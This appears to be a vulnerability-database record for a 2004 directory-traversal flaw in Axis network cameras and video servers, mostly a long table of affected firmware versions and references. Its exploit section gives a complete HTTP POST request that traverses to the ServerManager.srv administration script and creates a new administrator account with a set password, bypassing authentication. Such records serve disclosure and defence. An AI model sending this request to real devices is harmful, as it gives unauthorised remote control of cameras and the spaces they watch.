ID
VAR-E-200408-0045
EDB ID
24401
TITLE
Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal - CGI webapps Exploit
Trust: 0.6
DESCRIPTION
Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal. webapps exploit for CGI platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | axis | model: | network camera and video server | scope: | eq | version: | 2.x1-3 | Trust: 1.6 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24113.12 | Trust: 0.6 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 2401+3.12 | Trust: 0.6 |
vendor: | axis | model: | communications storpoint cd | scope: | - | version: | - | Trust: 0.3 |
vendor: | axis | model: | communications serial server | scope: | eq | version: | 2490 | Trust: 0.3 |
vendor: | axis | model: | communications network dvr | scope: | eq | version: | 2460 | Trust: 0.3 |
vendor: | axis | model: | communications mpeg-2 video server 250s | scope: | - | version: | - | Trust: 0.3 |
vendor: | axis | model: | communications 250s video server | scope: | eq | version: | 3.03 | Trust: 0.3 |
vendor: | axis | model: | communications 250s mpeg-2 video server | scope: | eq | version: | 3.10 | Trust: 0.3 |
vendor: | axis | model: | communications serial server | scope: | eq | version: | 24902.11.3 | Trust: 0.3 |
vendor: | axis | model: | communications network dvr | scope: | eq | version: | 24603.11 | Trust: 0.3 |
vendor: | axis | model: | communications network dvr | scope: | eq | version: | 24603.10 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24202.34 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24202.32 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.41 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.40 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.34 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.33 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.32 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.31 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.30 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 24202.12 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24113.13 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 2401+3.13 | Trust: 0.3 |
vendor: | axis | model: | communications blade video server | scope: | eq | version: | 2401+3.12 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.34 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.33 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.32 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.31 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.30 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24012.20 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24011.15 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24011.01 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 2400+3.12 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 2400+3.11 | Trust: 0.3 |
vendor: | axis | model: | communications blade video server | scope: | eq | version: | 2400+3.12 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.34 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.33 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.32 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.31 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.30 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.20 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24002.0 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.15 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.12 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.11 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.10 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.02 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | eq | version: | 24001.01 | Trust: 0.3 |
vendor: | axis | model: | communications mpeg-2 video server | scope: | eq | version: | 2303.11 | Trust: 0.3 |
vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.40 | Trust: 0.3 |
vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.34 | Trust: 0.3 |
vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.32 | Trust: 0.3 |
vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.31 | Trust: 0.3 |
vendor: | axis | model: | communications ptz network camera | scope: | eq | version: | 21302.30 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.41 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.40 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.34 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.32 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.31 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.30 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21202.12 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.41 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.40 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.34 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.32 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.31 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.30 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21102.12 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.41 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.40 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.34 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.33 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.32 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.31 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.30 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | eq | version: | 21002.12 | Trust: 0.3 |
vendor: | axis | model: | communications 250s mpeg-2 video server | scope: | ne | version: | 3.20 | Trust: 0.3 |
vendor: | axis | model: | communications digital video recorder | scope: | ne | version: | 24603.13 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | ne | version: | 24202.42 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | ne | version: | 24113.13 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | ne | version: | 2401+3.13 | Trust: 0.3 |
vendor: | axis | model: | communications blade video server | scope: | ne | version: | 2401+3.13 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | ne | version: | 24012.34.1 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | ne | version: | 2400+3.13 | Trust: 0.3 |
vendor: | axis | model: | communications blade video server | scope: | ne | version: | 2400+3.13 | Trust: 0.3 |
vendor: | axis | model: | communications video server | scope: | ne | version: | 24002.34.1 | Trust: 0.3 |
vendor: | axis | model: | communications mpeg-2 video server | scope: | ne | version: | 2303.20 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | ne | version: | 21302.42 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | ne | version: | 21202.42 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | ne | version: | 21102.42 | Trust: 0.3 |
vendor: | axis | model: | communications network camera | scope: | ne | version: | 21002.42 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/11011/info
A directory-traversal vulnerability exists in the handling of HTTP POST requests. The attack is demonstrated by an anonymous user calling protected administration scripts. This bypasses authentication checks and gives anonymous users remote administration of the devices.
This issue is reported to affect:
- Axis 2100, 2110, 2120, 2420 network cameras with firmware versions 2.12 through 2.40
- Axis 2130 network cameras
- Axis 2401 and 2401 video servers
POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0
Content-Length: 250
Pragma: no-cache
conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Directory Traversal
Trust: 1.0
CREDITS
bashis
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 24401 | Trust: 1.9 |
db: | BID | id: | 11011 | Trust: 1.9 |
db: | EDBNET | id: | 46535 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/11011/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/24401/ | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/24402 | Trust: 0.3 |
url: | http://www.axis.com/products/camera_servers/index.htm | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/24401 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/24400 | Trust: 0.3 |
SOURCES
db: | BID | id: | 11011 |
db: | EXPLOIT-DB | id: | 24401 |
db: | EDBNET | id: | 46535 |
LAST UPDATE DATE
2022-07-27T09:44:13.536000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 11011 | date: | 2007-02-06T20:08:00 |
SOURCES RELEASE DATE
db: | BID | id: | 11011 | date: | 2004-08-23T00:00:00 |
db: | EXPLOIT-DB | id: | 24401 | date: | 2004-08-23T00:00:00 |
db: | EDBNET | id: | 46535 | date: | 2004-08-23T00:00:00 |